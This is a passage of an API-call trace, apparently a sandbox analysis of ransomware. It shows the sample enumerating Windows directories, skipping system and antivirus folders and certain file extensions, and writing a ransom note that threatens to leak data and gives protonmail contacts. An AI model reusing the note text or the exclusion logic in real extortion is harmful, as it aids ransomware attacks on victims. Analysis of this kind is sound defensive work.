lstrcmpW (lpString1="VSTA", lpString2="..") returned 1 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="tmp") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="winnt") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="temp") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="thumb") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="$Recycle.Bin") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="System Volume Information") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="Boot") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="Windows") returned 0x0 [0160.795] StrStrIW (lpFirst="VSTA", lpSrch="Trend Micro") returned 0x0 [0160.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0160.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.795] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d01960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d01960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0160.795] lstrcmpW (lpString1="VSTO", lpString2=".") returned 1 [0160.795] lstrcmpW (lpString1="VSTO", lpString2="..") returned 1 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="tmp") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="winnt") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="temp") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="thumb") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="$Recycle.Bin") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="System Volume Information") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="Boot") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="Windows") returned 0x0 [0160.796] StrStrIW (lpFirst="VSTO", lpSrch="Trend Micro") returned 0x0 [0160.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0160.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.796] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0160.796] lstrcmpW (lpString1="Web Server Extensions", lpString2=".") returned 1 [0160.796] lstrcmpW (lpString1="Web Server Extensions", lpString2="..") returned 1 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="tmp") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="winnt") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="temp") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="thumb") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="$Recycle.Bin") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="System Volume Information") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="Boot") returned 0x0 [0160.796] StrStrIW (lpFirst="Web Server Extensions", lpSrch="Windows") returned 0x0 [0160.797] StrStrIW (lpFirst="Web Server Extensions", lpSrch="Trend Micro") returned 0x0 [0160.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0160.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0160.797] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.797] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0160.797] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.797] Sleep (dwMilliseconds=0x32) [0160.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\services\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0161.253] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0161.253] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0161.254] CloseHandle (hObject=0x6dc) returned 1 [0161.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.255] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.255] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x64ebce50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64ebce50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0161.255] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.255] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x64ebce50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64ebce50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.255] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.255] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.255] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64ebce50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x64ebce50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64ebce50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0161.255] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0161.255] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0161.256] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0161.256] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x892529fc, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0x892529fc, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0x892529fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0161.256] lstrcmpW (lpString1="verisign.bmp", lpString2=".") returned 1 [0161.256] lstrcmpW (lpString1="verisign.bmp", lpString2="..") returned 1 [0161.256] StrStrIW (lpFirst="verisign.bmp", lpSrch=".UAKXC") returned 0x0 [0161.256] StrStrIW (lpFirst="verisign.bmp", lpSrch=".exe") returned 0x0 [0161.256] StrStrIW (lpFirst="verisign.bmp", lpSrch=".dll") returned 0x0 [0161.256] StrStrIW (lpFirst="verisign.bmp", lpSrch=".lnk") returned 0x0 [0161.256] StrStrIW (lpFirst="verisign.bmp", lpSrch=".sys") returned 0x0 [0161.257] StrStrIW (lpFirst="verisign.bmp", lpSrch=".msi") returned 0x0 [0161.257] StrStrIW (lpFirst="verisign.bmp", lpSrch="R3ADM3.txt") returned 0x0 [0161.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3230 [0161.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.257] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0161.258] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3230 | out: hHeap=0xea0000) returned 1 [0161.258] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedeb10 [0161.258] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3230 [0161.258] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedeb98 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedeb10 | out: hHeap=0xea0000) returned 1 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.258] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x892529fc, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0x892529fc, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0x892529fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebfb0 | out: hHeap=0xea0000) returned 1 [0161.258] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeece00 | out: hHeap=0xea0000) returned 1 [0161.258] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0161.258] Sleep (dwMilliseconds=0x32) [0161.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebf48 | out: hHeap=0xea0000) returned 1 [0161.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796778 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796868 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0161.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796868 | out: hHeap=0xea0000) returned 1 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796868 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77969d0 [0161.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0161.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77969d0 | out: hHeap=0xea0000) returned 1 [0161.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796958 | out: hHeap=0xea0000) returned 1 [0161.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0161.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\speechengines\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0161.389] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0161.389] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0161.391] CloseHandle (hObject=0x6dc) returned 1 [0161.391] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0161.391] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796868 | out: hHeap=0xea0000) returned 1 [0161.391] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x65013ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x65013ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0161.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.391] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x65013ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x65013ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.392] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.392] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0161.392] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0161.392] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0161.392] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0161.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0161.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796868 [0161.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0161.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0161.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796958 | out: hHeap=0xea0000) returned 1 [0161.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796868 | out: hHeap=0xea0000) returned 1 [0161.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0161.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0161.392] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedeb10 [0161.392] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0161.392] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65013ab0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x65013ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x65013ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0161.392] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0161.393] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0161.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0161.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65013ab0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x65013ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x65013ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0161.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee590 | out: hHeap=0xea0000) returned 1 [0161.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd10 | out: hHeap=0xea0000) returned 1 [0161.393] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0161.393] Sleep (dwMilliseconds=0x32) [0161.445] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0161.445] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7796778 | out: hHeap=0xea0000) returned 1 [0161.445] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0161.445] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebf48 [0161.445] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebfb0 [0161.445] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebf48 | out: hHeap=0xea0000) returned 1 [0161.445] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebf48 [0161.445] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd10 [0161.446] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0161.446] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0161.446] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0161.446] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0161.446] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0161.446] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd10 | out: hHeap=0xea0000) returned 1 [0161.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\system\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0161.449] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0161.449] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0161.450] CloseHandle (hObject=0x6dc) returned 1 [0161.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0161.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebf48 | out: hHeap=0xea0000) returned 1 [0161.450] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x650ac030, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x650ac030, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0161.451] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.451] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x650ac030, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x650ac030, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.451] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.451] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.451] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0161.451] lstrcmpW (lpString1="ado", lpString2=".") returned 1 [0161.451] lstrcmpW (lpString1="ado", lpString2="..") returned 1 [0161.451] StrStrIW (lpFirst="ado", lpSrch="tmp") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="winnt") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="temp") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="thumb") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="$Recycle.Bin") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="$RECYCLE.BIN") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="System Volume Information") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", lpSrch="Boot") returned 0x0 [0161.451] StrStrIW (lpFirst="ado", 